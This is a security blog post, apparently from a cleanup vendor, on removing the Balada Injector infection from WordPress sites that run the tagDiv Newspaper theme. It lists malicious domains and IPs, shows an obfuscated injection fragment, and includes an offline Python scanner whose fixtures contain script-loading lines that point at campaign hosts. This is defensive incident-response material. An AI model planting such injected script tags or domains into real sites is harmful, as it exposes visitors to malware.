According to the PublicWWW engine, there are approx. 81513 sites using the Newspaper theme and tagDiv plugin – more than 4600 sites still show signs of contamination.
How to clean a website affected by tagDiv and Newspaper vulnerabilities.
- Back up the infected site, database and web files included. Keep everything, suspicious files too: they are the evidence for the analysis below and for the cross-site check in the last step.
- Restore WordPress core, plugins and themes one by one from fresh official downloads; do not reuse any file from the backup. wp-config.php may be copied back after you have reviewed it for injected code.
- Make sure /wp-content/uploads/ is malware-free: it should contain no .php or .zip files at all.
- Once you have a working WordPress site again, check the dashboard for admin users you did not create and remove them, then reset the passwords of the remaining accounts.
- Back up and review the wp_options table; on infected sites it typically contains obfuscated JavaScript (see the tdw-css-placeholder sample below). Find and remove every injection.
- Ask Google to reindex the site via Search Console once it is clean.
- Apply all available security updates and run PHP 7.4 or newer (7.4 itself has been end-of-life since November 2022, so prefer a currently supported 8.x release).
- Use Search Replace DB ver. 4.1.3 to strip the malicious code from wp_options, and delete the tool from the server as soon as you are done with it.
- Scan all the sites hosted on the same server for cross-site contamination. If other sites are affected, isolate them and repeat the cleanup for each one.
If you seek professional help with cleanup and security updates, check our Platinum plan.
https://members.magefix.com/product/platinum/
Malicious URLs:
https://where.selectofmychoices.com/scripts/step.js
https://gate.getmygateway.com/select
https://west.statisticplatform.com/stats
https://good.playerofsunshine.com/scripts/start.js
https://good.playerofsunshine.com/scripts/post.js
https://normal.playerofsunshine.com/scripts/start.js
https://cdn.statisticscripts.com/stats/get.js
https://here.selectofmychoices.com/scripts/get.js
https://try.selectofmychoices.com/script/start.js
https://best.playerofsunshine.com/scripts/cdn.js
https://fourth.gybritanalytsesystem.com/scripts/start.js
https://fifth.gybritanalytsesystem.com/script/step.js
https://content.streamfastcdn.com
Malicious IPs: 185.39.206.161, and the range 80.66.79.247 through 80.66.79.253 (Hyper Hosting SRL). The hostnames below are grouped by the address they resolved to at the time of analysis.
Malicious subdomains (grouped by resolving IP; west.statisticplatform.com was seen on both .251 and .248):

80.66.79.250
- store.bestselllerservice.com

80.66.79.251
- follow.forwardstarlight.com
- stay.forwardstarlight.com
- west.statisticplatform.com

80.66.79.252
- get.promsmotion.com
- show.bridgelinering.com
- net.promsmotion.com
- go.bridgelinering.com

80.66.79.253
- gate.getmygateway.com
- get.lightsteper.com
- cdn.specialtaskevents.com
- page.specialnewspaper.com

80.66.79.249
- special.beatifulllhistory.com

80.66.79.248
- west.statisticplatform.com
- goto.betradingway.com
- give.selectchoise.com
- north.statisticplatform.com
- got.selectchoise.com
- startup.betradingway.com

80.66.79.247
- call.getsmallcount.com
- get.statisticplatform.com
- got.statisticplatform.com
- come.statisticplatform.com
- bee.selectofmychoices.com
- best.playerofsunshine.com
- fourth.gybritanalytsesystem.com
- was.selectofmychoices.com
- where.selectofmychoices.com
- normal.playerofsunshine.com
- good.playerofsunshine.com
- try.selectofmychoices.com
- great.playerofsunshine.com
- third.gybritanalytsesystem.com
- here.selectofmychoices.com
- second.gybritanalytsesystem.com
- fifth.gybritanalytsesystem.com
- first.gybritanalytsesystem.com
- excelent.playerofsunshine.com
fromCharCode obfuscated code inside the tdw-css-placeholder option (a tagDiv setting stored in wp_options). The injected script assembles its strings piecewise from concatenated fragments and String.fromCharCode, so a plain search for the final keyword does not find it; the sample begins:
['fr'+'om'+String.fromCharCode(67
Malicious files & plugin folders: zexit.zip, wp-zexit, wp-swamp.
Files inside the core directories that the injector tampers with: wp-admin/js/custom-header.js, wp-includes/script-loader.js, wp-includes/js/wp-custom-header.js. Compare each against a clean WordPress download of the same version rather than trusting the copy on disk.
Sucuri SiteCheck result: Malware Found. Known JavaScript malware: malware.injection?35.54; known malware: malware.injection?35.59.
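The checks in the cleanup list and the indicators above can be automated for triage. The script below is an added example written for this post, not MageFix's tooling or anything distributed by tagDiv. It walks a site directory for .php/.zip files under uploads, for the wp-zexit / wp-swamp / zexit.zip names and for the campaign's domains and IPs, and runs the same matching over a text export of wp_options so the tdw-css-placeholder injection shows up with its line number. The sample site and dump rows it builds are constructed fixtures, and nothing is fetched from the network. It flags, it does not clean: review every hit and remove it by hand or with Search Replace DB as described above.

```python
"""Offline triage for a Balada-style tagDiv/Newspaper infection.

Added example, not MageFix's own tooling. It automates the file-system and
wp_options checks from the cleanup list, using the domains, IPs, file names
and obfuscation pattern from the IOC section. All fixtures are constructed.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Registered domains from the IOC list; matching the base domain also catches
# the campaign's rotating subdomains (first./second./third./... and so on).
IOC_DOMAINS = [
    "selectofmychoices.com", "getmygateway.com", "statisticplatform.com",
    "playerofsunshine.com", "statisticscripts.com", "gybritanalytsesystem.com",
    "streamfastcdn.com", "bestselllerservice.com", "forwardstarlight.com",
    "promsmotion.com", "bridgelinering.com", "lightsteper.com",
    "specialtaskevents.com", "specialnewspaper.com", "beatifulllhistory.com",
    "betradingway.com", "selectchoise.com", "getsmallcount.com",
]
IOC_IPS = ["185.39.206.161"] + [f"80.66.79.{n}" for n in range(247, 254)]
DOMAIN_RE = re.compile(r"(?<![a-z0-9.-])(?:[a-z0-9-]+\.)*(?:%s)(?![a-z0-9-])"
                       % "|".join(map(re.escape, IOC_DOMAINS)), re.IGNORECASE)
IP_RE = re.compile(r"(?<![0-9.])(?:%s)(?![0-9])" % "|".join(map(re.escape, IOC_IPS)))
# 'fr'+'om'+String.fromCharCode( as seen in tdw-css-placeholder; the optional
# backslashes also accept the \' escaping that mysqldump writes into its output.
OBFUSC_RE = re.compile(
    r"""\\?['"]fr\\?['"]\s*\+\s*\\?['"]om\\?['"]\s*\+\s*String\.fromCharCode\s*\(""")

UPLOAD_EXEC_SUFFIXES = {".php", ".phtml", ".zip"}  # uploads should hold none of these
KNOWN_BAD_NAMES = {"wp-zexit", "wp-swamp", "zexit.zip"}
MAX_SCAN_BYTES = 2 * 1024 * 1024  # skip large media; injected code lives in small files


def scan_text(text: str) -> List[Tuple[str, str]]:
    """Return (kind, match) for every domain, IP or obfuscation hit in text."""
    hits = [("domain", m.group(0).lower()) for m in DOMAIN_RE.finditer(text)]
    hits += [("ip", m.group(0)) for m in IP_RE.finditer(text)]
    hits += [("obfuscation", m.group(0)) for m in OBFUSC_RE.finditer(text)]
    return hits


def scan_site(root: Path) -> Dict[str, List]:
    """Walk a WordPress root: executables in uploads, known-bad names, IOC hits."""
    root = Path(root)
    uploads = root / "wp-content" / "uploads"
    report: Dict[str, List] = {"uploads_executables": [], "known_bad_paths": [], "file_hits": []}
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        if path.name in KNOWN_BAD_NAMES:  # dropped plugin folder or archive, dir or file
            report["known_bad_paths"].append(rel)
        if not path.is_file():
            continue
        if uploads in path.parents and path.suffix.lower() in UPLOAD_EXEC_SUFFIXES:
            report["uploads_executables"].append(rel)
        if path.stat().st_size <= MAX_SCAN_BYTES:
            for kind, match in scan_text(path.read_text(encoding="utf-8", errors="ignore")):
                report["file_hits"].append((rel, kind, match))
    return report


def scan_options_dump(dump: str) -> List[Tuple[int, str, str]]:
    """Scan a text export of wp_options (mysqldump / wp db export) line by line."""
    return [(no, kind, match)
            for no, line in enumerate(dump.splitlines(), 1)
            for kind, match in scan_text(line)]


# Constructed wp_options rows in mysqldump style (not taken from a real site).
SAMPLE_OPTIONS_DUMP = "\n".join([
    "(1,'siteurl','https://example.org','yes'),",
    "(2,'blogname','Example News','yes'),",
    "(3,'tdw-css-placeholder','<script>[\\'fr\\'+\\'om\\'+String.fromCharCode(67,104)](1)</script>','yes'),",
    "(4,'widget_text','<script src=https://cdn.statisticscripts.com/stats/get.js></script>','yes'),",
])


def build_fixture(base: Path) -> Path:
    """Create a constructed sample site under base that trips each check once."""
    files = {
        "wp-config.php": "<?php define('DB_NAME', 'wp');",
        "wp-content/uploads/2023/10/photo.jpg": "\xff\xd8 fake image bytes",
        "wp-content/uploads/2023/10/cache.php": "<?php /* constructed: PHP has no business under uploads */",
        "wp-content/uploads/zexit.zip": "PK\x03\x04 constructed archive",
        "wp-content/plugins/wp-zexit/index.php": "<?php $c = 'http://80.66.79.251/'; // constructed",
        "wp-content/plugins/akismet/akismet.php": "<?php // legitimate plugin, clean",
        "wp-includes/js/wp-custom-header.js": "var s=document.createElement('script');"
            "s.src='https://fourth.gybritanalytsesystem.com/scripts/start.js';",
    }
    root = base / "site"
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body, encoding="utf-8")
    return root


def run_demo() -> Tuple[Dict[str, List], List[Tuple[int, str, str]]]:
    """Build the fixture in a temp dir, scan it and the sample dump, return both reports."""
    with tempfile.TemporaryDirectory() as tmp:
        site_report = scan_site(build_fixture(Path(tmp)))
    return site_report, scan_options_dump(SAMPLE_OPTIONS_DUMP)


if __name__ == "__main__":
    print(run_demo())
```

Against a real site call scan_site(Path("/var/www/html")) and scan_options_dump(open("wp_options.sql").read()). Matching on the registered domains instead of the exact hostnames is deliberate: the list above shows the campaign rotating subdomains (first. through fifth. on gybritanalytsesystem.com), so a scanner keyed to yesterday's hostnames misses tomorrow's injection.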
How this malware works: see "Balada Injector Targets Unpatched tagDiv Plugin, Newspaper Theme & WordPress Admins".
Twitter @500mk500:
#Balada malware campaign
forwardstarlight\.com
selectchoise\.com
statisticplatform\.com
subs:
follow.forwardstarlight\.com
give.selectchoise\.com
got.selectchoise\.com
north.statisticplatform\.com
stay.forwardstarlight\.com
west.statisticplatform\.com
IPs: 80.66.79[.](248|251) https://t.co/XsXkPHhvbE
— Mikhail Kasimov (@500mk500) October 9, 2023
Decoded malware
Decoded west.statisticplatform[.]com/stats script. Same idea as in the promsmotion[.]com scripts described here https://t.co/BYpWYYulOR https://t.co/K5n33RJcG8 pic.twitter.com/DQacTJTrin
— Denis (@unmaskparasites) October 9, 2023